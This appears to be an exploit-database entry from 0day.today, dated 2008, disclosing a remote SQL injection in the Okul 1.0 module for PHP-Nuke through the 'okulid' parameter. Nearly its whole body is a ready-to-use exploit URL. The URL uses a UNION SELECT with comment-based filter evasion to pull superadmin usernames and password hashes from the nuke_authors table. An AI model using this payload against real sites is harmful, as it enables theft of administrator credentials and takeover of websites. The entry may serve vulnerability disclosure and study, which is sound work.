id: 2670
date: 02/20/2008
title: PHP-Nuke Modules Okul 1.0 (okulid) Remote SQL Injection Vulnerability
author: xoron
cves: 

=====================================================================
PHP-Nuke Modules Okul 1.0 (okulid) Remote SQL Injection Vulnerability
=====================================================================



=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules Okul v1.0 Remote SQL Injection

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=




#  0day.today [2023-03-24]  #